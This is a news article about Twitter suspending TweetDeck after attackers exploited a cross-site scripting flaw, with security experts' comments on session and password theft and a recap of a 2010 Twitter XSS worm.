Twitter has been forced to suspend its TweetDeck client to investigate and fix a security flaw that could expose users to account hijack and other malicious activity.
The microblogging service took action after hackers began exploiting a cross-site scripting (XSS) vulnerability in TweetDeck versions 3.7.1-19002e5.
TweetDeck – a UK firm Twitter bought for £25m in 2011 – allows users to collate different feeds.
The coding vulnerability has hit several high-profile accounts, including BBC Breaking News and that of Labour party leader Ed Miliband, reports the BBC.
Although most of these have been harmless, the flaw can also be exploited to do other things, including take over accounts, post tweets, and follow and unfollow people, reported the Guardian.
XSS threat to devices
Read more about XSS
- Royal Holloway 2012: A framework for preventing cross-site scripting
- Cross-site scripting vulnerability discovered in Adobe Flash Player
- Overcoming the challenges of cross-site scripting testing
- Stamp out XSS cross scripting vulnerabilities with proactive measures
- Mozilla fixes cross-site-scripting flaws
Security firm Rapid7 said it had seen a “worm” that self-replicates by creating malicious tweets, affecting mainly users of the TweetDeck plugin for Google Chrome.
But the firm warned that one of the most common XSS attacks is used to steal the user’s session, enabling attackers to take over accounts.
The normal Twitter web interface, and other apps such as Echofon which use Twitter's API, do not seem to be affected, the paper said.
TweetDeck was suspended temporarily after the first attempt to fix the problem failed.
Users were advised to log out and log back in to apply the initial fix, but some users who did so reported that the problem had not been solved.
George Anderson, director at security firm Webroot, said the possibility of running a script on a user’s device is what makes the XSS vulnerability so dangerous.
Risk to passwords
“The script can send any sensitive information accessible from within the browser back to the hacker, so an attacker can gain access to the user’s private information – such as passwords, usernames and card numbers,” he said.
Anderson said that signing out might help to contain the infection only if a user’s devices is not already infected.
“Because XSS steals the cookie sign-on information, users should get rid of all saved passwords, as well as sign-in again on a secure browser session and change their login-ins,” he said.
“It could also potentially tweet as the user, thereby spreading itself. It could be as big as the Samy worm from MySpace,” he said.
In September 2010, attacks exploiting an XSS vulnerability hit Twitter, causing users to spread a message and annoy victims with pop-up windows.
Victims of the Twitter attack only had to scroll over the Twitter message, which then activated the malicious code.
Once activated, the message was reposted and viewable by the victim's followers, allowing it to quickly spread across the website, like a worm.
Pop-up windows led victims to third-party websites peddling porn, but Twitter assured users no user information was compromised.